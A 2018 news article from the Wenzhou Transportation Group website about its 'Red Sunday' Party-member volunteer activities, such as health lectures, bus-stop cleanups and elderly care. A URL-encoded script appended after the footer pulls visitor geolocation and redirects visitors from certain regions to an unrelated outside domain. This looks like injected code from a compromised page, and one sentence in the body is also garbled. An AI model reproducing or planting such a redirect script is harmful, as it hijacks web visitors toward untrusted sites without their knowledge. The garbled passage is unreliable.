当前位置: 您当前的位置 : 温州交运集团 > 交运资讯 > 集团要闻 >正文
“红色星期天”交运服务在身边
来源: 发布时间:2018年12月19日 11:14:58 作者: 字体:

  近日,集团号召开展“红色星期天——交运服务在身边”党员志愿服务活动,进一步发挥党员先锋模范作用,提升党组织的组织力、向心力和凝聚力,筑牢基层党组织战斗堡垒。集团所属各单位积极落实,不断丰富活动内容和载体,送资源下乡、送服务上门,为广大群众提供家门口的红色服务。

  集团在“瓯江红”党群服务中心开展“红色星期天,交运服务在身边”党员志愿服务活动,邀请到市营养师协会副会长周婷婷为大家讲解冬季养生知识,得到了现场居民的一致好评。讲座结束后,交运党员志愿者还拿出准备好的糯米粉、黑芝麻等原材料,与现场居民们一起包起汤圆。活动现。写笕舜判『、有一家三口的,有老少同堂的,大家有的和面、有点调馅,有条不紊的忙碌着,志愿者们和社区居民拉家常,互相“切磋技艺”,大家脸上洋溢着欢快的笑容。

  城西公交行政党支部兵分两路,到黄龙始发站和加州首末站开展红色服务活动,通过打扫卫生,整理路边的共享单车,在斑马线维持秩序,在公交站台开展安全管理,为市民营造舒适文明的乘车环境;西一分公司党支部组织志愿者到仙岩街道渔潭村参观中共浙南“一大”会址纪念馆,观看红色电影,开展卫生打扫,重温我党奋斗历程,领悟革命初心。西二党支部组织参观“瓯江红”温州市党群服务中心,并在马鞍池、水心邮电等公交站头和斑马线上宣传交通安全知识。此外,城西公交各班组的志愿者也纷纷开展了形式多样的“红色星期天”活动。14路、28路、75路班组志愿者走上市区街头,开展整理共享单车活动,捡拾路上垃圾,为创建美丽温州城贡献一份力量;73路班组志愿者来到永嘉县三栖村,开展关爱“空巢老人”活动,送去慰问品及关怀;7路班组志愿者在各公交站台、车厢内开展安全宣传,排查安全隐患;5路、65路班组来到江心屿参观革命烈士纪念馆,并通过义务清扫为保护历史文化遗产出一份力;26路、57路班组志愿者在浦西老年活动中心帮助老人们择菜、淘米,准备午餐,闲话家常,受到老人们的欢迎和好评。

  城东公交东二分公司党支部的志愿者在智慧谷和永中首末站宣传多票制无人售票线路的乘车注意事项,并解答公交线路咨询;东三党支部组织92路党员,带领87、88路、89、100路班组成员齐动手,在附一新院首末站开展卫生清扫,并召开班组会议分享创建心得,现场学习氛围浓厚;信息分中心党支部的志愿者参观“瓯江红”温州市党群服务中心,并在谢池巷充值点开展公交IC卡宣传推广活动,分发96035“青年文明号”服务卡,为市民解疑答惑。

  城际公司党总支联合“红日亭”在双屿客运站为来往旅客、出租车司机、保洁人员、执勤交警等送去热气腾腾的八宝粥和汤圆,传递爱心和温暖。

  洞头公司组织10余名青年志愿者到新城客运站摆摊设点,发放宣传资料、解答公交咨询,宣传公交安全乘车知识,倡议做文明乘客,自觉遵守公交秩序。活动还宣传了洞头与农业银行联合开展的享受“半价去温州”的优惠业务等,帮助群众解决出行中遇到的困难,助推城乡客运一票制工作。

  资产公司党支部开展“红色细胞工程”,通过与黎明西路社区党组织建立联系服务机制,不断推广为民服务、创先争优活动。志愿者们组织慰问了辖区孤寡老人、老党员,并与黎明西路社区党委、菜篮子集团等单位联合向周边居民分发汤圆。下一步,公司将配合社区开展食品安全、五水共治、消防安全、科普、生态等系列宣传活动,以社区空巢老人、留守儿童、困难职工等为重点,通过“一对一”、“多对一”结对帮扶为他们提供生活照料等服务,让群众切实感受到党组织的关怀和温暖,进一步推动“红色星期天”活动常态化、个性化、专业化发展。

  物流公司党总支组织党员到黄龙君子峰开展保护环境志愿服务活动,通过分组分区域的全方位清扫,改善了君子峰的整体环境。

  汽服公司党总支在上陡门社区向居民宣传了车辆年审的流程和支付宝预约年检的服务,告知了站外非法人员代办年检的不可信及隐藏性:,讲解了车管家业务,普及了车辆基本的保养常识。

  国旅公司党支部在新城站为候车乘客分发安全须知提示单,提供乘车指引服务,分发矿泉水及小点心。其热情、周到、细致的服务得到了好评。据了解,活动开始前,党员志愿者们还重温了入党誓词,通过鼓舞士气以更加饱满的热情投身志愿服务工作。

  燃料公司党总支联合绿园社区居委会,在蒲鞋市街道党群服务中心开启“安全加油知识进社区”活动。党员志愿者们免费为社区居民提供安全加油知识咨询服务以及油卡充值优惠活动,同时向他们发放活动纪念品,鼓励居民积极参与红色星期天活动,多提宝贵意见。

  交通技校党员志愿者们前往百里西路“复兴亭”,为登记在册的孤寡老人提供“早餐送上门”服务,为过往的环卫工人、行人派发早餐,免费供应茶水,宣传冬季疾病防范知识。学校还向复兴亭捐赠了200斤大米等物资。有志愿者们表示:“夏送伏茶,冬施热粥,温州‘复兴亭’一年365天不歇地传递着温州人的善念和执着的精神令人佩服和感动。我们参加党员志愿服务活动,积极投身公益活动,也是为传递善心善行尽一份绵薄之力,更是向那些长期致力于慈善公益的集体和个人致敬”。

  房开公司在中山公园一带为过往行人发放法制宣传资料,开展普法宣传教育,通过文明劝导营造安全良好的交通环境。活动中,党员志愿者们通过“亮旗帜、亮身份、亮行动”,吸引凝聚了许多党员群众参与其中。

  龙发公司党支部联合团委、班组建设力量在汽车东站发放行车安全宣传资料,讲解冬季交通安全知识及出行注意事项,并为旅客送上生活物资,提供帮扶提行李服务,充分发挥党员的先锋模范作用。

  “红色星期天”活动是筑牢基层堡垒、提高基层组织力的有力抓手,是发挥党员先锋模范作用、引领社会风尚的重要载体。系列活动的开展,实现了党员志愿服务群众的“红色覆盖”,发挥了党员先锋模范作用,用实际行动践行了基层党组织联系社会群体、党员联系群众的服务机制。

交运资讯

WENZHOU TRANSPORTATION

交运电子报

GROUP BRIEFING

交运电子报

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E